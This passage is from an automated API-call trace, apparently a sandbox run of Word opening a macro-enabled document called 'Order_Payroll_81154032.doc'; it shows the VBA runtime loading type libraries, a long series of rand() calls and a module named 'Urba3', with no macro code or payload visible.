lpbstrPathName=0x205eb0 | out: lpbstrPathName=0x205eb0) returned 0x0 [0044.844] LoadTypeLibEx (in: szFile="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL", regkind=0x2, pptlib=0x205f08*=0x0 | out: pptlib=0x205f08*=0x7edf740) returned 0x0 [0044.852] IUnknown:AddRef (This=0x7edf740) returned 0x2 [0044.852] ITypeLib:RemoteGetDocumentation (in: This=0x7edf740, index=-1, refPtrFlags=0x205f28, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x4757c0 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x4757c0*="\x57c0\x47") returned 0x0 [0044.852] IUnknown:QueryInterface (in: This=0x7edf740, riid=0x7fee4035c68*(Data1=0xcacc1e84, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x205d18 | out: ppvObject=0x205d18*=0x0) returned 0x80004002 [0044.852] ITypeLib:RemoteGetLibAttr (in: This=0x7edf740, ppTLibAttr=0x205d10, pDummy=0x10 | out: ppTLibAttr=0x205d10, pDummy=0x10) returned 0x0 [0044.852] ITypeLib:RemoteGetDocumentation (in: This=0x7edf740, index=-1, refPtrFlags=0x0, pbstrName=0x205d08, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0xbf9f18e0c23d | out: pbstrName=0x205d08*="Visual Basic For Applications", pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0xbf9f18e0c23d) returned 0x0 [0044.852] StringFromGUID2 (in: rguid=0x7e02300*(Data1=0x204ef, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), lpsz=0x205d30, cchMax=39 | out: lpsz="{000204EF-0000-0000-C000-000000000046}") returned 39 [0044.852] _ultow_s (in: _Value=0x4, _Buffer=0x205c7a, _BufferCount=0x10, _Radix=16 | out: _Buffer="4") returned 0x0 [0044.852] _ultow_s (in: _Value=0x2, _Buffer=0x205c7e, _BufferCount=0xe, _Radix=16 | out: _Buffer="2") returned 0x0 [0044.852] _ultow_s (in: _Value=0x9, _Buffer=0x205c82, _BufferCount=0xc, _Radix=16 | out: _Buffer="9") returned 0x0 [0044.852] wcscpy_s (in: _Destination=0x27a50a8, _SizeInWords=0x91, _Source="*\\G" | out: _Destination="*\\G") returned 0x0 [0044.853] wcscpy_s (in: _Destination=0x27a50ae, _SizeInWords=0x8e, _Source="{000204EF-0000-0000-C000-000000000046}" | out: _Destination="{000204EF-0000-0000-C000-000000000046}") returned 0x0 [0044.853] wcscpy_s (in: _Destination=0x27a50fa, _SizeInWords=0x68, _Source="#4.2#9#" | out: _Destination="#4.2#9#") returned 0x0 [0044.853] wcscpy_s (in: _Destination=0x27a5108, _SizeInWords=0x61, _Source="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL" | out: _Destination="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL") returned 0x0 [0044.853] wcscpy_s (in: _Destination=0x27a518e, _SizeInWords=0x1e, _Source="Visual Basic For Applications" | out: _Destination="Visual Basic For Applications") returned 0x0 [0044.853] ITypeLib:LocalReleaseTLibAttr (This=0x7edf740) returned 0x0 [0044.853] IMalloc:Realloc (This=0x7feff045380, pv=0x2705fa0, cb=0x340) returned 0x8132180 [0044.853] wcscpy_s (in: _Destination=0x81322c8, _SizeInWords=0x91, _Source="*\\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL#Visual Basic For Applications" | out: _Destination="*\\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL#Visual Basic For Applications") returned 0x0 [0044.853] ITypeLib:RemoteGetDocumentation (in: This=0x7edf740, index=-1, refPtrFlags=0x205e28, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x3 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x3) returned 0x0 [0044.853] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VBA") returned 0x10e2f7 [0044.853] strcpy_s (in: _Dst=0x205c20, _DstSize=0x4, _Src="VBA" | out: _Dst="VBA") returned 0x0 [0044.853] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x205c20, cbMultiByte=4, lpWideCharStr=0x205a70, cchWideChar=4 | out: lpWideCharStr="VBA") returned 4 [0044.853] IUnknown:AddRef (This=0x3dd7b80) returned 0x3 [0044.853] ITypeLib:RemoteIsName (in: This=0x3dd7b80, szNameBuf="VBA", lHashVal=0x10e2f7, pfName=0x205b40, pBstrLibName=0x205a70 | out: pfName=0x205b40*=0, pBstrLibName=0x205a70) returned 0x0 [0044.870] IUnknown:Release (This=0x3dd7b80) returned 0x2 [0044.870] IMalloc:Alloc (This=0x7feff045380, cb=0xc) returned 0x8004410 [0044.870] IMalloc:Free (This=0x7feff045380, pv=0x7e01dc0) [0044.870] IMalloc:Alloc (This=0x7feff045380, cb=0x20) returned 0x7e01dc0 [0044.870] IMalloc:Free (This=0x7feff045380, pv=0x8004410) [0044.870] wcsncpy_s (in: _Destination=0x205a20, _SizeInWords=0x108, _Source="*\\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL#Visual Basic For Applications", _MaxCount=0x106 | out: _Destination="*\\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL#Visual Basic For Applications") returned 0x0 [0044.870] CharLowerBuffW (in: lpsz="*\\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL#Visual Basic For Applications", cchLength=0x90 | out: lpsz="*\\g{000204ef-0000-0000-c000-000000000046}#4.2#9#c:\\program files\\common files\\microsoft shared\\vba\\vba7.1\\vbe7.dll#visual basic for applications") returned 0x90 [0044.870] IMalloc:Alloc (This=0x7feff045380, cb=0x122) returned 0x8085e20 [0044.870] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\g{000204ef-0000-0000-c000-000000000046}#4.2#9#c:\\program files\\common files\\microsoft shared\\vba\\vba7.1\\vbe7.dll#visual basic for applications", cchWideChar=145, lpMultiByteStr=0x8085e20, cbMultiByte=290, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\g{000204ef-0000-0000-c000-000000000046}#4.2#9#c:\\program files\\common files\\microsoft shared\\vba\\vba7.1\\vbe7.dll#visual basic for applications", lpUsedDefaultChar=0x0) returned 145 [0044.870] IMalloc:Free (This=0x7feff045380, pv=0x8085e20) [0044.870] IMalloc:Realloc (This=0x7feff045380, pv=0x80885c0, cb=0x440) returned 0x3e6c410 [0044.870] wcscpy_s (in: _Destination=0x3e6c610, _SizeInWords=0x91, _Source="*\\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL#Visual Basic For Applications" | out: _Destination="*\\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL#Visual Basic For Applications") returned 0x0 [0044.870] wcsncpy_s (in: _Destination=0x205a60, _SizeInWords=0x108, _Source="*\\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL#Visual Basic For Applications", _MaxCount=0x106 | out: _Destination="*\\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL#Visual Basic For Applications") returned 0x0 [0044.870] CharLowerBuffW (in: lpsz="*\\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL#Visual Basic For Applications", cchLength=0x90 | out: lpsz="*\\g{000204ef-0000-0000-c000-000000000046}#4.2#9#c:\\program files\\common files\\microsoft shared\\vba\\vba7.1\\vbe7.dll#visual basic for applications") returned 0x90 [0044.870] IMalloc:Alloc (This=0x7feff045380, cb=0x122) returned 0x8085e20 [0044.870] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\g{000204ef-0000-0000-c000-000000000046}#4.2#9#c:\\program files\\common files\\microsoft shared\\vba\\vba7.1\\vbe7.dll#visual basic for applications", cchWideChar=145, lpMultiByteStr=0x8085e20, cbMultiByte=290, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\g{000204ef-0000-0000-c000-000000000046}#4.2#9#c:\\program files\\common files\\microsoft shared\\vba\\vba7.1\\vbe7.dll#visual basic for applications", lpUsedDefaultChar=0x0) returned 145 [0044.870] IMalloc:Free (This=0x7feff045380, pv=0x8085e20) [0044.870] wcsncpy_s (in: _Destination=0x205a20, _SizeInWords=0x108, _Source="*\\CC:\\Users\\aETAdzjz\\Desktop\\Order_Payroll_81154032.doc", _MaxCount=0x106 | out: _Destination="*\\CC:\\Users\\aETAdzjz\\Desktop\\Order_Payroll_81154032.doc") returned 0x0 [0044.870] CharLowerBuffW (in: lpsz="*\\CC:\\Users\\aETAdzjz\\Desktop\\Order_Payroll_81154032.doc", cchLength=0x37 | out: lpsz="*\\cc:\\users\\aetadzjz\\desktop\\order_payroll_81154032.doc") returned 0x37 [0044.870] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\cc:\\users\\aetadzjz\\desktop\\order_payroll_81154032.doc", cchWideChar=56, lpMultiByteStr=0x205950, cbMultiByte=112, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\cc:\\users\\aetadzjz\\desktop\\order_payroll_81154032.doc", lpUsedDefaultChar=0x0) returned 56 [0044.870] _wcsicmp (_String1="*\\CC:\\Users\\aETAdzjz\\Desktop\\Order_Payroll_81154032.doc", _String2="*\\CC:\\Users\\aETAdzjz\\Desktop\\Order_Payroll_81154032.doc") returned 0 [0044.870] IUnknown:AddRef (This=0x7edf740) returned 0x3 [0044.870] IUnknown:QueryInterface (in: This=0x7edf740, riid=0x7fee40385a0*(Data1=0xcacc1e8a, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x205e48 | out: ppvObject=0x205e48*=0x0) returned 0x80004002 [0044.870] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBA", cchWideChar=4, lpMultiByteStr=0x205e10, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBA", lpUsedDefaultChar=0x0) returned 4 [0044.870] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VBA") returned 0x10e2f7 [0044.871] IUnknown:Release (This=0x7edf740) returned 0x2 [0044.871] IMalloc:Alloc (This=0x7feff045380, cb=0x0) returned 0x80753d0 [0044.871] IMalloc:GetSize (This=0x7feff045380, pv=0x80753d0) returned 0x0 [0044.871] IMalloc:Alloc (This=0x7feff045380, cb=0x0) returned 0x80753e0 [0044.871] IMalloc:GetSize (This=0x7feff045380, pv=0x80753e0) returned 0x0 [0044.876] VirtualQuery (in: lpAddress=0x2063f0, lpBuffer=0x2063b0, dwLength=0x30 | out: lpBuffer=0x2063b0*(BaseAddress=0x206000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0xa000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0044.876] IMalloc:Alloc (This=0x7feff045380, cb=0x0) returned 0x80753f0 [0044.876] qsort (in: _Base=0x80753f0, _NumOfElements=0x0, _SizeOfElements=0x10, _PtFuncCompare=0x7fee3de5594 | out: _Base=0x80753f0) [0044.877] IMalloc:Free (This=0x7feff045380, pv=0x80753f0) [0044.877] IMalloc:Alloc (This=0x7feff045380, cb=0x18) returned 0x8004410 [0044.877] IMalloc:Alloc (This=0x7feff045380, cb=0xc) returned 0x80044f0 [0044.877] IMalloc:GetSize (This=0x7feff045380, pv=0x80044f0) returned 0xc [0044.877] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Win16") returned 0x107ec1 [0044.877] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Win32") returned 0x107f07 [0044.877] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Win64") returned 0x107f78 [0044.877] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Mac") returned 0x10b2b3 [0044.877] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VBA6") returned 0x1023ad [0044.877] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VBA7") returned 0x1023ae [0044.877] IMalloc:Free (This=0x7feff045380, pv=0x80753e0) [0044.877] IMalloc:Free (This=0x7feff045380, pv=0x80753d0) [0044.878] CoCreateGuid (in: pguid=0x2064f8 | out: pguid=0x2064f8*(Data1=0x7a3fd792, Data2=0x5100, Data3=0x4f2d, Data4=([0]=0xac, [1]=0x4f, [2]=0x48, [3]=0x24, [4]=0x73, [5]=0x1, [6]=0xeb, [7]=0xe9))) returned 0x0 [0044.878] IMalloc:Alloc (This=0x7feff045380, cb=0x6b0) returned 0x813a740 [0044.878] srand (_Seed=0x5196) [0044.878] rand () returned 2707 [0044.878] rand () returned 5367 [0044.878] rand () returned 3107 [0044.878] rand () returned 25991 [0044.878] rand () returned 22224 [0044.878] rand () returned 7173 [0044.878] rand () returned 3305 [0044.878] rand () returned 5542 [0044.878] rand () returned 21093 [0044.878] rand () returned 7093 [0044.878] rand () returned 29645 [0044.878] rand () returned 30555 [0044.878] rand () returned 4452 [0044.878] rand () returned 15519 [0044.878] rand () returned 22682 [0044.878] rand () returned 20118 [0044.878] rand () returned 26125 [0044.878] rand () returned 28117 [0044.878] rand () returned 31912 [0044.878] rand () returned 27549 [0044.878] rand () returned 25247 [0044.878] rand () returned 12135 [0044.878] rand () returned 31572 [0044.878] rand () returned 27055 [0044.878] rand () returned 11630 [0044.878] rand () returned 26157 [0044.878] rand () returned 24237 [0044.878] rand () returned 16615 [0044.878] rand () returned 23350 [0044.878] rand () returned 7360 [0044.878] rand () returned 27760 [0044.878] rand () returned 12132 [0044.878] rand () returned 17327 [0044.878] rand () returned 21962 [0044.878] rand () returned 16183 [0044.879] rand () returned 15783 [0044.879] rand () returned 1121 [0044.879] rand () returned 21376 [0044.879] rand () returned 32749 [0044.879] rand () returned 25148 [0044.879] rand () returned 9658 [0044.879] rand () returned 30828 [0044.879] rand () returned 21381 [0044.879] rand () returned 2205 [0044.879] rand () returned 5726 [0044.879] rand () returned 9584 [0044.879] rand () returned 20715 [0044.879] rand () returned 32595 [0044.879] rand () returned 28862 [0044.879] rand () returned 14600 [0044.879] rand () returned 4923 [0044.879] rand () returned 4446 [0044.879] rand () returned 16108 [0044.879] rand () returned 5071 [0044.879] rand () returned 15410 [0044.879] rand () returned 20183 [0044.879] rand () returned 12462 [0044.879] rand () returned 17989 [0044.879] rand () returned 31458 [0044.879] rand () returned 18644 [0044.879] rand () returned 30673 [0044.879] rand () returned 19407 [0044.879] rand () returned 27305 [0044.879] rand () returned 17548 [0044.879] rand () returned 16063 [0044.879] rand () returned 30463 [0044.879] rand () returned 24163 [0044.879] rand () returned 10684 [0044.879] rand () returned 27988 [0044.879] rand () returned 29462 [0044.879] rand () returned 27615 [0044.879] rand () returned 12361 [0044.879] rand () returned 12270 [0044.879] rand () returned 32455 [0044.879] rand () returned 19344 [0044.879] rand () returned 4390 [0044.879] rand () returned 29891 [0044.879] rand () returned 17470 [0044.880] rand () returned 24709 [0044.880] rand () returned 15992 [0044.880] rand () returned 21368 [0044.880] rand () returned 29281 [0044.880] rand () returned 31899 [0044.880] rand () returned 26360 [0044.880] rand () returned 4847 [0044.880] rand () returned 31574 [0044.880] rand () returned 13554 [0044.880] rand () returned 18585 [0044.880] rand () returned 16736 [0044.880] rand () returned 7237 [0044.880] rand () returned 23197 [0044.880] rand () returned 5740 [0044.880] rand () returned 4779 [0044.880] rand () returned 4703 [0044.880] rand () returned 27550 [0044.880] rand () returned 30144 [0044.880] rand () returned 30956 [0044.880] rand () returned 8479 [0044.880] rand () returned 4113 [0044.880] rand () returned 22157 [0044.880] rand () returned 11088 [0044.880] rand () returned 19919 [0044.880] rand () returned 30631 [0044.880] rand () returned 11027 [0044.880] rand () returned 3880 [0044.880] rand () returned 29775 [0044.880] rand () returned 11094 [0044.880] rand () returned 17086 [0044.880] rand () returned 14140 [0044.880] rand () returned 6418 [0044.880] rand () returned 10063 [0044.880] rand () returned 19533 [0044.880] rand () returned 28002 [0044.880] rand () returned 7273 [0044.880] rand () returned 20785 [0044.880] rand () returned 17203 [0044.880] rand () returned 31311 [0044.880] rand () returned 13060 [0044.880] rand () returned 7804 [0044.880] rand () returned 19517 [0044.880] rand () returned 8108 [0044.881] rand () returned 18357 [0044.881] rand () returned 32584 [0044.881] rand () returned 17782 [0044.881] rand () returned 30829 [0044.881] rand () returned 10872 [0044.881] rand () returned 24887 [0044.881] rand () returned 3400 [0044.881] rand () returned 13150 [0044.881] rand () returned 12465 [0044.881] rand () returned 24232 [0044.881] rand () returned 17635 [0044.881] rand () returned 23550 [0044.881] rand () returned 10932 [0044.881] rand () returned 28205 [0044.881] rand () returned 4579 [0044.881] rand () returned 9617 [0044.881] rand () returned 21130 [0044.881] rand () returned 9792 [0044.881] rand () returned 9004 [0044.881] rand () returned 27761 [0044.881] rand () returned 6131 [0044.881] rand () returned 26929 [0044.881] rand () returned 32025 [0044.881] rand () returned 24997 [0044.881] rand () returned 28071 [0044.881] rand () returned 3427 [0044.881] rand () returned 20695 [0044.881] rand () returned 5300 [0044.881] rand () returned 31713 [0044.881] rand () returned 21944 [0044.881] rand () returned 25355 [0044.881] rand () returned 20411 [0044.881] rand () returned 23582 [0044.881] rand () returned 20042 [0044.881] rand () returned 17851 [0044.881] rand () returned 31166 [0044.881] rand () returned 16930 [0044.881] rand () returned 24924 [0044.881] rand () returned 26987 [0044.881] rand () returned 29500 [0044.881] rand () returned 13885 [0044.881] rand () returned 14480 [0044.882] rand () returned 18822 [0044.882] rand () returned 8454 [0044.882] rand () returned 17612 [0044.882] rand () returned 15962 [0044.882] rand () returned 14336 [0044.882] rand () returned 6481 [0044.882] rand () returned 18178 [0044.882] rand () returned 21428 [0044.882] rand () returned 3130 [0044.882] rand () returned 9993 [0044.882] rand () returned 10473 [0044.882] rand () returned 3603 [0044.882] rand () returned 14630 [0044.882] rand () returned 5992 [0044.882] rand () returned 20643 [0044.882] rand () returned 4506 [0044.882] rand () returned 3755 [0044.882] rand () returned 1480 [0044.882] rand () returned 2806 [0044.882] rand () returned 23438 [0044.882] rand () returned 10827 [0044.882] rand () returned 6581 [0044.882] rand () returned 8456 [0044.882] rand () returned 4363 [0044.882] rand () returned 23299 [0044.882] rand () returned 27463 [0044.882] rand () returned 31590 [0044.882] rand () returned 9717 [0044.882] rand () returned 31858 [0044.882] rand () returned 430 [0044.882] rand () returned 30283 [0044.882] rand () returned 28720 [0044.882] rand () returned 3390 [0044.882] rand () returned 8207 [0044.882] rand () returned 19232 [0044.882] rand () returned 31508 [0044.882] rand () returned 1204 [0044.882] rand () returned 21647 [0044.882] rand () returned 13119 [0044.882] rand () returned 12059 [0044.882] rand () returned 11182 [0044.882] rand () returned 32173 [0044.883] rand () returned 10236 [0044.883] rand () returned 8669 [0044.883] rand () returned 31930 [0044.883] rand () returned 14804 [0044.883] rand () returned 25574 [0044.883] rand () returned 8767 [0044.883] rand () returned 20344 [0044.883] rand () returned 30000 [0044.883] rand () returned 2378 [0044.883] rand () returned 21735 [0044.883] rand () returned 21316 [0044.883] rand () returned 2498 [0044.883] rand () returned 4601 [0044.883] rand () returned 29939 [0044.883] rand () returned 7445 [0044.883] rand () returned 9647 [0044.883] rand () returned 27723 [0044.883] rand () returned 3306 [0044.883] rand () returned 19621 [0044.883] rand () returned 27614 [0044.883] rand () returned 26980 [0044.883] rand () returned 15346 [0044.883] rand () returned 3283 [0044.883] rand () returned 705 [0044.883] rand () returned 24758 [0044.883] rand () returned 23364 [0044.883] rand () returned 29509 [0044.883] rand () returned 1395 [0044.883] rand () returned 11463 [0044.883] rand () returned 6110 [0044.883] rand () returned 849 [0044.883] rand () returned 2820 [0044.883] rand () returned 25909 [0044.883] rand () returned 21623 [0044.883] rand () returned 22558 [0044.883] rand () returned 14353 [0044.883] rand () returned 31223 [0044.883] rand () returned 26552 [0044.883] rand () returned 14854 [0044.883] rand () returned 3735 [0044.883] rand () returned 5093 [0044.883] rand () returned 2729 [0044.883] rand () returned 9023 [0044.884] rand () returned 28680 [0044.884] CoCreateGuid (in: pguid=0x7fd4bc8 | out: pguid=0x7fd4bc8*(Data1=0x40380b00, Data2=0xdb39, Data3=0x440a, Data4=([0]=0xba, [1]=0x3c, [2]=0xe1, [3]=0xb, [4]=0xda, [5]=0x6f, [6]=0x23, [7]=0xa9))) returned 0x0 [0044.884] IMalloc:Realloc (This=0x7feff045380, pv=0x0, cb=0x0) returned 0x80753d0 [0044.884] IMalloc:Realloc (This=0x7feff045380, pv=0x0, cb=0x412) returned 0x3e6c860 [0044.884] strcpy_s (in: _Dst=0x7fd4c28, _DstSize=0x1, _Src="" | out: _Dst="") returned 0x0 [0044.884] CExposedDocFile::OpenStream () returned 0x0 [0044.884] CExposedStream::Read () returned 0x0 [0044.884] IMalloc:Alloc (This=0x7feff045380, cb=0x2028) returned 0x813ae00 [0044.885] IMalloc:Alloc (This=0x7feff045380, cb=0x10020*=0x10128) returned 0x813ce30 [0044.885] CExposedStream::AddRef () returned 0x2 [0044.886] CExposedStream::Release () returned 0x1 [0044.886] CExposedStream::Read () returned 0x0 [0044.886] CExposedStream::Read () returned 0x0 [0044.889] GetProcAddress (hModule=0x7fee34b0000, lpProcName=0x7fee40521d0) returned 0x0 [0044.890] CompareStringA (Locale=0x409, dwCmpFlags=0x3, lpString1="Test", cchCount1=-1, lpString2="Test", cchCount2=-1) returned 2 [0044.890] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x0, lpMultiByteStr=0x2064f4, cbMultiByte=2, lpWideCharStr=0x206508, cchWideChar=2 | out: lpWideCharStr="") returned 2 [0044.890] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Urba3", cchWideChar=6, lpMultiByteStr=0x206480, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Urba3", lpUsedDefaultChar=0x0) returned 6 [0044.890] lstrcmpiA (lpString1="", lpString2="Urba3") returned -1 [0044.890] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Urba3", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0044.890] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Urba3", cchWideChar=-1, lpMultiByteStr=0x206380, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Urba3", lpUsedDefaultChar=0x0) returned 6 [0044.890] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Urba3") returned 0x10a220 [0044.891] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Urba3", cchWideChar=6, lpMultiByteStr=0x206290, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Urba3", lpUsedDefaultChar=0x0) returned 6 [0044.891] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Urba3") returned 0x10a220 [0044.891] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Urba3", cchWideChar=6, lpMultiByteStr=0x206290, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Urba3", lpUsedDefaultChar=0x0) returned 6 [0044.891] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Urba3", cchWideChar=6, lpMultiByteStr=0x206150, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Urba3", lpUsedDefaultChar=0x0) returned 6 [0044.891] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Urba3") returned 0x10a220 [0044.891] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Urba3") returned 0x10a220 [0044.891] IMalloc:Alloc (This=0x7feff045380, cb=0x18) returned 0x80040b0 [0044.891] IMalloc:Free (This=0x7feff045380, pv=0x7e01dc0) [0044.891] IMalloc:Alloc (This=0x7feff045380, cb=0x20) returned 0x7e01dc0 [0044.891] IMalloc:Realloc (This=0x7feff045380, pv=0x7e01dc0, cb=0x44) returned 0x7fbfc00 [0044.891] IMalloc:Free (This=0x7feff045380, pv=0x80040b0) [0044.891] strcpy_s (in: _Dst=0x7fd4c38, _DstSize=0x6, _Src="Urba3" | out: _Dst="Urba3") returned 0x0 [0044.894] CLSIDFromString (in: lpsz="{00020430-0000-0000-C000-000000000046}", pclsid=0x206490 | out: pclsid=0x206490*(Data1=0x20430, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0044.894] wcsncpy_s (in: _Destination=0x8114ea8, _SizeInWords=0x5f, _Source="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\System32\\stdole2.tlb#OLE Automation", _MaxCount=0x30 | out: _Destination="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#") returned 0x0 [0044.894] wcscpy_s (in: _Destination=0x8114f08, _SizeInWords=0x2f, _Source="C:\\Windows\\System32\\stdole2.tlb" | out: _Destination="C:\\Windows\\System32\\stdole2.tlb") returned 0x0 [0044.894] wcscpy_s (in: _Destination=0x8114f46, _SizeInWords=0x10, _Source="#OLE Automation" | out: _Destination="#OLE Automation") returned 0x0 [0044.895] IMalloc:Realloc (This=0x7feff045380, pv=0x8132180, cb=0x680) returned 0x814ce60 [0044.895] wcscpy_s (in: _Destination=0x814d120, _SizeInWords=0x5f, _Source="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\System32\\stdole2.tlb#OLE Automation" | out: _Destination="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\System32\\stdole2.tlb#OLE Automation") returned 0x0 [0044.895] wcsncpy_s (in: _Destination=0x2060e0, _SizeInWords=0x108, _Source="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\System32\\stdole2.tlb#OLE Automation", _MaxCount=0x106 | out: _Destination="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\System32\\stdole2.tlb#OLE Automation") returned 0x0 [0044.895] CharLowerBuffW (in: lpsz="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\System32\\stdole2.tlb#OLE Automation", cchLength=0x5e | out: lpsz="*\\g{00020430-0000-0000-c000-000000000046}#2.0#0#c:\\windows\\system32\\stdole2.tlb#ole automation") returned 0x5e [0044.895] IMalloc:Alloc (This=0x7feff045380, cb=0xbe) returned 0x8133080 [0044.895] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\g{00020430-0000-0000-c000-000000000046}#2.0#0#c:\\windows\\system32\\stdole2.tlb#ole automation", cchWideChar=95, lpMultiByteStr=0x8133080, cbMultiByte=190, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\g{00020430-0000-0000-c000-000000000046}#2.0#0#c:\\windows\\system32\\stdole2.tlb#ole automation", lpUsedDefaultChar=0x0) returned 95 [0044.895] IMalloc:Free (This=0x7feff045380, pv=0x8133080) [0044.895] wcscpy_s (in: _Destination=0x3e6c768, _SizeInWords=0x5f, _Source="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\System32\\stdole2.tlb#OLE Automation" | out: _Destination="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\System32\\stdole2.tlb#OLE Automation") returned 0x0 [0044.895] wcsncpy_s (in: _Destination=0x206120, _SizeInWords=0x108, _Source="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\System32\\stdole2.tlb#OLE Automation", _MaxCount=0x106 | out: _Destination="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\System32\\stdole2.tlb#OLE Automation") returned 0x0 [0044.895] CharLowerBuffW (in: lpsz="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\System32\\stdole2.tlb#OLE Automation", cchLength=0x5e | out: 